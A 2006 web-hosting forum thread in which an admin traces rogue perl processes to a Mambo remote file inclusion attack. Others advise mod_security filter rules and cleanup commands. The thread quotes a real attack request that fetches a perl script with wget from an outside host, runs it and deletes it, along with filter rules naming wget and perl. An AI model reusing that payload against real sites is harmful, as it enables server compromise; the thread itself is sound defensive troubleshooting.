Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

can not trace process - httpsl

Discussion in 'General Discussion' started by sint19, Aug 7, 2006.

  1. sint19

    sint19 Member

    Joined:
    Feb 16, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    151
    I have a lot of httpsl processes, about 50 at same time
    example one of them
    [/proc/28899]# ls -al
    total 0
    dr-xr-xr-x 3 nobody nobody 0 Aug 7 19:04 ./
    dr-xr-xr-x 1522 root root 0 Aug 6 00:31 ../
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 cmdline
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 cpu
    lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 cwd -> //
    -r-------- 1 nobody nobody 0 Aug 7 19:05 environ
    lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 exe -> /usr/bin/perl*
    dr-x------ 2 nobody nobody 0 Aug 7 19:05 fd/
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 maps
    -rw------- 1 nobody nobody 0 Aug 7 19:05 mem
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 mounts
    lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 root -> //
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 stat
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 statm
    -r--r--r-- 1 nobody nobody 0 Aug 7 19:05 status



    lsof -p 28899
    COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
    perl 28899 nobody cwd DIR 130,46 1024 456187906 /
    perl 28899 nobody rtd DIR 130,46 1024 456187906 /
    perl 28899 nobody txt REG 130,46 942729 509666453 /usr/bin/perl
    perl 28899 nobody 0r CHR 1,3 457965571 /dev/null
    perl 28899 nobody 1w FIFO 130,5 977102708 pipe
    perl 28899 nobody 2w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
    perl 28899 nobody 3u IPv4 977413800 TCP my.server.com:34124->rm43.1blu.de:8209 (ESTABLISHED)
    perl 28899 nobody 4u unix 0xa22b77e0 977102504 socket
    perl 28899 nobody 5u unix 0x248a2760 976881059 socket
    perl 28899 nobody 15w REG 130,46 0 689897478 /usr/local/apache/logs/audit_log
    perl 28899 nobody 16w REG 130,46 0 689897485 /usr/local/apache/logs/modsec_debug_log
    perl 28899 nobody 17w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
    ... a lot of domlogs



    for CWD (current working folder) I have only '/'
    cat environ - there is nothing
    any idea how to stop this (blocking rm43.1blu.de IP will not solve problem)

    thanks
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,460
    Likes Received:
    21
    Trophy Points:
    463
    Location:
    Go on, have a guess
    Looks like a perl script being run through a compromised PHP script. You're going to have to wade through your domlogs to track it down.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  3. sint19

    sint19 Member

    Joined:
    Feb 16, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    151
    Bingo

    Thank you, I find it, but still I don't know the best way how to stop this

    203.113.132.116 - - [08/Aug/2006:01:56:47 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/webdesign/images/CISLA/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/webdesign/images/CISla/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 24007 "-" "Mozilla/5.0"

    exploit use mambo ''mosConfig_absolute_path''
    exploit copy mambo.txt perl script to /tmp, execute it, and delete it
     
  4. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    164
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Install mod security through WHM -> Addon Scripts, then add rules to /usr/local/apache/conf/modsec.user.conf and add a rule such as

    SecFilter "mosConfig_absolute_path"
    SecFilter "wget"
    SecFilter "com_content"
    SecFilter "perl\x20"

    Those will easily block the widely spread exploit / worm.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  5. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    164
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Also run killall -9 perl;killall -9 httpd;httpd stop;httpd startssl

    That will clear any old processes or running exploits, and restart apache fresh after you've installed mod security and applied the necessary paths.



    In the meantime, chmod 700 /usr/bin/wget

    ASAP to avoid further exploitation.
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
  6. sint19

    sint19 Member

    Joined:
    Feb 16, 2003
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    151
    All done

    except
    SecFilter "com_content"

    it is needed for running mambo, but

    SecFilter "mosConfig_absolute_path"
    SecFilter "wget"

    do great job (HTTP Error 406 - Not acceptable)

    Thanks you
     
  7. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    164
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    I would also suggest SecFilter "perl\x20"

    As that is "perl " and will be used in almost any exploit to run any file. It's better to be safe.

    Also you can use my version at http://www.hostmerit.com/modsec.user.conf

    It's highly recommended by many users of the Cpanel forums, as I code it myself and update ALOT, also it was recommended directly by Cpanel in a presentation on security at HostingCon.:p :p
     
    Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand...
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice